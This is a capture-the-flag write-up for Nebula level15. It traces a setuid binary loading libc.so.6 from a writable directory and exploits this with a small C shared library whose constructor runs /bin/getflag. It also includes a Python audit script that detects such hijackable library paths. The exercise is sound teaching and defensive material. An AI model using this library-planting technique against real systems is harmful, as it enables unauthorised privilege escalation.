Nebula level15

About
strace the binary at /home/flag15/flag15 and see if you spot anything out of the ordinary.
You may wish to review how to "compile a shared library in linux" and how the libraries are loaded and processed by reviewing the dlopen manpage in depth.
Clean up after yourself :)
To do this level, log in as the level15 account with the password level15. Files for this level can be found in /home/flag15.

This level was a PITA. I knew from the very beginning what I should do and how to do it; however, I had compilation issues (i.e. my initial PoC was valid). Let's get on with it.

Naturally, first we should follow the clues:

level15@nebula:~$ strace /home/flag15/flag15
(...)
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15", {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 0

(...)

So, the binary tries to load a rogue libc.so.6 from /var/tmp/flag15 (the open() fails with ENOENT because no such file exists yet) and, as it happens, we can write to the /var/tmp/flag15 directory. Splendid.
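The same observation can be turned into a routine check for library search-path hijacking: scan strace output for shared-library opens that fail with ENOENT in a directory outside the system library paths and that the current user can write to. This is an added example, not code from the original post; the trace lines are constructed from the output above, and the `writable_dirs` argument is a hypothetical hook that replaces the filesystem check so the logic can be exercised offline.

```python
import os
import re

# Constructed sample, modelled on the strace output of /home/flag15/flag15.
SAMPLE_TRACE = """\
open("/etc/ld.so.cache", O_RDONLY) = 3
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15", {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 0
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY) = 3
"""

# Matches both open("...") and openat(AT_FDCWD, "...") for a .so that failed with ENOENT.
FAILED_SO_OPEN = re.compile(
    r'^open(?:at\(AT_FDCWD,\s*|\()"([^"]+\.so[^"]*)",\s*O_RDONLY[^)]*\)\s*=\s*-1 ENOENT'
)

# Directories the dynamic loader is expected to search; a miss here is normal.
TRUSTED_PREFIXES = ("/lib", "/lib64", "/usr/lib", "/usr/lib64")


def failed_library_opens(trace):
    """Return the library paths the loader tried and failed to open, in order."""
    hits = []
    for line in trace.splitlines():
        m = FAILED_SO_OPEN.match(line)
        if m:
            hits.append(m.group(1))
    return hits


def is_trusted(directory):
    return any(directory == p or directory.startswith(p + "/") for p in TRUSTED_PREFIXES)


def hijackable(path, writable_dirs=None):
    """True if the missing library's directory is untrusted and writable by us.

    writable_dirs is a hypothetical test hook: when given, it stands in for the
    real os.access() check so the function can run without that directory.
    """
    directory = os.path.dirname(path)
    if is_trusted(directory):
        return False
    if writable_dirs is not None:
        return directory in writable_dirs
    return os.path.isdir(directory) and os.access(directory, os.W_OK)


def audit(trace, writable_dirs=None):
    """List the failed library opens that an unprivileged user could satisfy."""
    return [p for p in failed_library_opens(trace) if hijackable(p, writable_dirs)]
```

Run it against `strace -f -o trace.txt ./binary` output; any path it reports is a library the binary would load from a location you control, which is exactly what this level exploits.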

To abuse this behaviour we need to compile our own shared library that executes /bin/getflag from within.

Now, I did remember about this (namely, __libc_start_main()) but I forgot about this (namely, constructors and destructors: init() and fini()). Kudos to @joernchen for reminding me.

After writing the initial PoC I was stuck for a couple of days, and as it turned out it was because of a wrong compilation method. But thanks to that I managed to write a more elegant exploit (the initial PoC involved hijacking __libc_start_main() and was ugly). Here it is:


#include <unistd.h>

/* Runs automatically when the library is loaded, before main() of the host binary. */
static void __attribute__ ((constructor)) pwn(void);

static void pwn(void) {
    execve("/bin/getflag", 0, 0);
}

And here's the funny part: I will not reveal how to compile it, but I assure you that this works (as does very simple hijacking of __libc_start_main()).

level15@nebula:/var/tmp/flag15$ /home/flag15/flag15
You have successfully executed getflag on a target account
